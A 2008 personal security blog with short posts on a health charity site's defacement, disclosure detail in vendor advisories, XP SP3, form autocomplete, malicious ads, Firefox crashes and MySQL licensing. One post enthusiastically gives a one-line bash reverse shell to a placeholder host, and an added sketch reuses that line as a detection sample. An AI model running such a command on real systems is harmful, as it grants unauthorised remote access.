05.08.08
Posted in IT, Security at 3:57 pm by Tyler Reguly
I read this today on a local news site and the only thought that went through my head was "wow"... Essentially a malicious individual hacked the Epilepsy Foundation's website and posted hundreds of rapidly flashing images. While I don't condone it... I can understand why people think they should target websites for profit or pride... but this? It's just plain mean... It makes me wonder what the world is coming to.
Update: Apparently this is old news and I'm a little slow finding out about it.
Posted in IT, Security at 10:04 am by Tyler Reguly
There were a couple of random things that I wanted to comment on.
The first was a post by Dave Lewis of Liquidmatrix. The post in question is a discussion of a Wonderware advisory released by Core Security and the level of detail that they provided. Dave doesn't agree with the level of detail provided... as they had details on how to exploit the vulnerability and even showed the assembly from the vulnerable function. He also comments that this isn't responsible disclosure. I'm <sarcasm>really glad to see this debate is coming up again</sarcasm>... but really where's the lack of responsible disclosure? Core reported the vulnerability to the vendor (repeatedly) and went out of their way to ensure the vendor was aware, this is more than a lot of people / companies do. They then continually pushed their advisory release date to accommodate the company. These details are being released after the patch as well.
There's absolutely nothing wrong with this... it's really no different from the level of detail provided by other security vendors that release advisories. Once the patch is out there isn't much to stop malicious individuals from obtaining the assembly to the vulnerable function... a copy of IDA Pro and BinDiff is really all they need. Outside of the assembly... the level of detail provided is really the same as most other security vendors that release advisories. I've seen them include some sort of binary analysis in the past... and most of them contain a text write-up... here's an example with enough text to more than locate the vulnerability from TippingPoint / ZDI:
The specific flaw exists in the oninit.exe process that listens by default on TCP port 1526. During authentication, the process does not validate the length of the supplied user password. An attacker can provide an overly long password and overflow a stack based buffer resulting in arbitrary code execution.
Part of the problem with the InfoSec battle is that the bad guys have essentially unlimited time, whereas IS employees have families and lives and work a set schedule. The Core advisory has set internal security teams on their way to developing their own exploits should they need to, without it they'd have had a lot more work to do and it would have taken them more time. Core did everything short of release the related Python and you can't really blame them, since then they'd be giving away their product for free. In the end, what they did was, in my opinion, beneficial to all.
It's one thing to simply release details, but as soon as someone works with the vendor you can't really cry foul when they publish the details. At least not on the 'responsible disclosure' front... because they've followed responsible disclosure and in this case Core Security hasn't done anything different than a number of vendors. Microsoft Tuesday is coming up and watch the mailing lists, each vendor that has reported a vuln usually sends out some sort of advisory and these range from brief overviews to full binary analysis and specific details on exploiting the vulnerability. We've seen it before and we'll see it again... but the patch is out, so they aren't helping the malicious individuals... just the good guys who have time constraints.
05.06.08
Posted in IT at 3:46 am by Tyler Reguly
I found this blog post rather interesting today. It's an explanation of how SP3 and IE will work together. Essentially it comes down to the following:
If you have IE6: It's business as usual... you will be offered SP3 via Windows Update and you'll still be running IE6 after the update.
If you have IE7: You will be offered SP3 via Windows Update, however once you complete the install of SP3 you'll be unable to revert to IE6. Due to updates that are included for IE6 (which won't be installed since you have IE7), IE7 cannot be uninstalled.
If you have IE8 Beta: You will NOT be offered SP3 via Windows Update. As well, once you install SP3 you will NOT be able to uninstall IE8 Beta. Microsoft is recommending that you uninstall IE8 Beta, install SP3 and then reinstall IE8 Beta if you are using it.
04.26.08
Posted in IT at 2:50 am by Tyler Reguly
One of my favourite things is Autocomplete. I'm sure plenty of security folks are cringing right now, but I enjoy it. It saves me a crapload of data entry every time I want to place an order (Name, Address, Phone number) or post a blog comment (Name, Email, Website)...
Anyways... what really bothers me is web developers that don't know about, or refuse to acknowledge the existence of, autocomplete. Let's compare two online ordering systems that I use frequently.
One contains a check box asking if you'd like it to remember your information (excluding credit card information). The entire order form is set to autocomplete=off and if I check the check box, my info is stored in a cookie with a very long expiry date.
The other doesn't save my info, I have to fill it out every time... This is where autocomplete is nice. Name, Address, Apartment Number, Buzzer Code, City, Postal Code, Phone, Email, etc.... Lots of info to provide but for me it's just first letter + tab. I like this feature... My problem is when I get to credit card information. This website hasn't seen the need to set the credit card related fields to autocomplete=off. Now I know that after I order I have to clear saved form data... this was once an issue though.
I ordered from this company via credit card, but then I moved over to cash orders... months later I happened to order via credit card again... this was when I discovered that the data was autocompleted. I find this very frightening for a number of reasons.
So I want to know... do web developers really have a hard time with autocomplete? I want to point out how important and how vital it is to your online form development. That's all... nothing really here, just a bit of a rant that I wanted to get out. Enjoy.
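The check the rant above asks developers to make can be automated. This Python sketch is an added example, not code from the post: it walks a page's forms and reports card-related inputs whose effective autocomplete setting is not off. The field-name heuristic, the function names and the sample markup are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Assumption: field names that suggest payment-card data.
CARD_HINT = re.compile(r"card|cc[-_]?(num|exp)|cvv|cvc", re.I)
SKIP_TYPES = {"hidden", "submit", "button", "checkbox", "radio"}

class AutocompleteAudit(HTMLParser):
    """Collect card-like inputs whose effective autocomplete is not 'off'."""
    def __init__(self):
        super().__init__()
        self.form_setting = None  # autocomplete value on the enclosing <form>
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        setting = (a.get("autocomplete") or "").strip().lower()
        if tag == "form":
            self.form_setting = setting or None
        elif tag == "input" and (a.get("type") or "text").lower() not in SKIP_TYPES:
            name = a.get("name") or a.get("id") or ""
            # The field's own attribute wins over the form's; the default is on.
            effective = setting or self.form_setting or "on"
            if CARD_HINT.search(name) and effective != "off":
                self.findings.append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_setting = None

def audit(html):
    """Return the names of card-like fields the browser is allowed to remember."""
    parser = AutocompleteAudit()
    parser.feed(html)
    return parser.findings

# Constructed sample markup modelled on the two order forms described above.
SHOP_A = """<form autocomplete="off">
<input name="address"><input name="card_number"><input name="cvv">
<input type="checkbox" name="remember_me"></form>"""
SHOP_B = """<form>
<input name="address"><input name="card_number"><input name="cvv"></form>"""
SHOP_B_FIXED = """<form>
<input name="address">
<input name="card_number" autocomplete="off"><input name="cvv" autocomplete="off"></form>"""

if __name__ == "__main__":
    for label, page in (("A", SHOP_A), ("B", SHOP_B), ("B fixed", SHOP_B_FIXED)):
        print(label, audit(page))
```

Browser handling of the attribute varies, so this reports what the markup asks for, not what a particular browser ends up storing.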
04.22.08
Posted in IT, Security at 9:52 am by Tyler Reguly
I don't have much to add, simply details from the original post. Spyware Sucks has a post up documenting some malicious flash that is being served from LiveJournal.com (from one of their banner ads). Just thought I should share to keep people informed.
04.21.08
Posted in IT, Security at 10:31 pm by Tyler Reguly
I've been kinda quiet here the last few days... That being said I've been posting quite a bit on the nCircle VERT blog. I decided that I wouldn't cross post between blogs and I won't post links to CDO on the nCircle blog for no reason, however I will post links to the nCircle blog on here...
In the past few days I've posted these stories on the nCircle blog... feel free to give them a read:
I've got a couple interesting blog posts in the works, that will most likely show up here in the near future... but for now there's something to read.
04.17.08
Posted in IT, Security at 3:07 pm by Tyler Reguly
This is really cool... Neohapsis has a great blog post on how a one line bash shell command can create a reverse shell (via Infosec Ramblings).
Think about all those times when you needed a single command line to create a reverse shell... this will do it:
exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
That's it... plain and simple and you're done... no need for any outside tools... just the ability to run built-in shell commands.
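From the defender's side, the command above leaves a recognisable trace wherever command strings are recorded (shell history, arguments passed to a shell, script contents): a redirection whose target is a /dev/tcp path, followed by other descriptors duplicated onto it. This Python sketch is an added example, not code from Neohapsis or from this post; the function names, the two labels it returns and the constructed sample lines are assumptions.

```python
import re

# A redirection (optional fd number in front) whose target is bash's
# /dev/tcp/<host>/<port> or /dev/udp/<host>/<port> pseudo-path.
NET_REDIRECT = re.compile(
    r"(?P<fd>\d*)(?P<op><>|>>|>&|<|>)\s*[\"']?"
    r"/dev/(?P<proto>tcp|udp)/(?P<host>[^/\s\"']+)/(?P<port>[^\s\"';&|]+)"
)
# fd duplication such as 1>&0: group 1 is the fd being set, group 3 its source.
FD_DUP = re.compile(r"(\d*)([<>])&(\d+)")

def default_fd(fd, op):
    """Shell default: input operators act on fd 0, output operators on fd 1."""
    return fd or ("0" if op.startswith("<") else "1")

def find_net_redirects(command):
    """Return one dict per network redirection found in a command string."""
    return [
        {"fd": default_fd(m["fd"], m["op"]), "proto": m["proto"],
         "host": m["host"], "port": m["port"]}
        for m in NET_REDIRECT.finditer(command)
    ]

def classify(command):
    """None, 'net-redirect', or 'stdio-on-socket' (stdin and stdout both on it)."""
    redirects = find_net_redirects(command)
    if not redirects:
        return None
    bound = {r["fd"] for r in redirects}
    for m in FD_DUP.finditer(command):
        if m.group(3) in bound:
            bound.add(default_fd(m.group(1), m.group(2)))
    return "stdio-on-socket" if {"0", "1"} <= bound else "net-redirect"

# Constructed sample lines; the first is the command quoted in the post.
SAMPLES = [
    "exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0",
    "echo > /dev/tcp/db.example.internal/5432",   # simple port probe
    "grep -r /dev/tcp /etc",                      # mention only, no redirection
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "|", line)
```

The redirection is handled by the shell itself, so it shows up in logged command strings but not in the argument list of the process that ends up running.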
Posted in IT at 10:54 am by Tyler Reguly
I'm wondering if anyone has been experiencing issues with Firefox 2.0.0.14? I installed it as soon as I noticed it... which I'm guessing was 6-7 hours ago but that may be +/- an hour or two. Since then I've had Firefox crash at least 6 times (never more than two tabs open... usually GMail and Bloglines). It just starts "Not Responding" and won't come back out of it.
System:
Windows XP SP2 fully updated
Core2 Quad Q6600 @ 2.40GHz
3GB RAM available to the OS (32-bit OS)
Plugins Installed: SQL Inject Me, XSS Me, TamperData, User Agent Switcher, Web Developer, Firebug and Greasemonkey.
Posted in IT at 9:59 am by Tyler Reguly
A while ago I stopped reading Slashdot because I generally find the information presented to be over-the-top and bordering on "zealot-like"... I suppose "overly dramatic" would work as well. However I was clicking through and ended up on the main page, which led to reading the following headline: Sun to Begin Close Sourcing MySQL. It led me to this article and I realized that the Slashdot headline was overzealous and so was Jeremy Cole.
Essentially, MySQL will be releasing some advanced features only to its enterprise customers. I get this... It makes business sense. The age old adage is, after all, "Why buy the cow, when you can get the milk for free". I kinda feel that the FOSS community sometimes feels a sense of entitlement that they don't deserve. There are plenty of FOSS users and supporters, but how many of them actually contribute back to FOSS? They do nothing, until they may lose some "advanced functionality"... then they scream as loud as anyone else.
Numerous people on Jeremy's website commented that MySQL was going to be giving "beta-like" software to their enterprise customers because they didn't have the community to test it. This puts way too much importance on the community. There are plenty of closed-source and paid software companies that ship software directly to enterprise customers without first running it by the FOSS community. This software does just fine.
In the end, this is a bunch of sour grapes over something that really isn't that big of a deal. Use another database or pay for the enterprise software.
04.16.08
Posted in IT, Operating Systems, Windows at 5:11 pm by Tyler Reguly
SANS ISC is reporting that various sources are saying that we may see XP SP3 before the end of the month, with OEMs and MSDN subscribers seeing the patch on April 21st and an end-user release date of April 28th.